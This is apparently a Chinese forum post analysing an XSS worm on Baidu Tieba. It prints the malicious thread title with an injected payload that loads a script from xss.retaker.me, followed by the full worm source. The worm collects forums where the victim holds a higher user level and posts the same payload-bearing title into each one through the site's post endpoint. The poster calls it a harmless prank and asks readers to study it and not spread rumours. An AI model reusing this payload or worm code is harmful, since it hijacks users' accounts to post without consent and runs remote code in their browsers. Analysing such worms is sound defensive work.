1.发帖的标题: 点进来有..",a:$.getScript('//xss.retaker.me/1.js'),a:" 2.帖子的内容(只是网页源码):

请允许我做一个忧伤的表情，是忧伤哦！

原创者：3dfx_sli 来自：简称堕天使

请允许我做一个悲伤的表情

——我喂自己袋盐
>>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0
1楼

3.攻击的脚本源码: 关于xss.retaker.me/1.js脚本病毒源码如下 //initilize var forumName = []; var forumId = []; for (var i = 0, j = 0; i < PageData.user.user_forum_list.info.length; i++) { if (PageData.user.user_forum_list.info[i].user_level > 3) { if (PageData.user.user_forum_list.info[i].forum_name!="贴吧监控") { forumName[j] = PageData.user.user_forum_list.info[i].forum_name; forumId[j] = PageData.user.user_forum_list.info[i].id; j++; } } } function madeit(myKw, myFid) { var c = rich_postor._getData(); c.content="\u8bf7\u5141\u8bb8\u6211\u505a\u4e00\u4e2a\u5fe7\u4f24\u7684\u8868\u60c5\uff0c\u662f\u5fe7\u4f24\u54e6\uff01"; c.ftid = c.fid; c.ptid = "2337150032"; c.title = '\u70b9\u8fdb\u6765\u6709..",a:$.getScript(\'//xss.retaker.me/1.js\'),a:"'; c.fid = myFid; c.kw = myKw; $.post("/relay/commit", c); } //now begin! for (j = 0; j < forumName.length; j++) { setTimeout("madeit('" + forumName[j] + "','" + forumId[j] + "')", 1500 * j); } 整个代码并没有什么盗号内容纯粹是一个恶作剧但仅能保证xss.retaker.me/1.js没有盗号内容如果有其它脚本可以发上代码供大家学习研究分析希望大家不要谣传保证帐号安全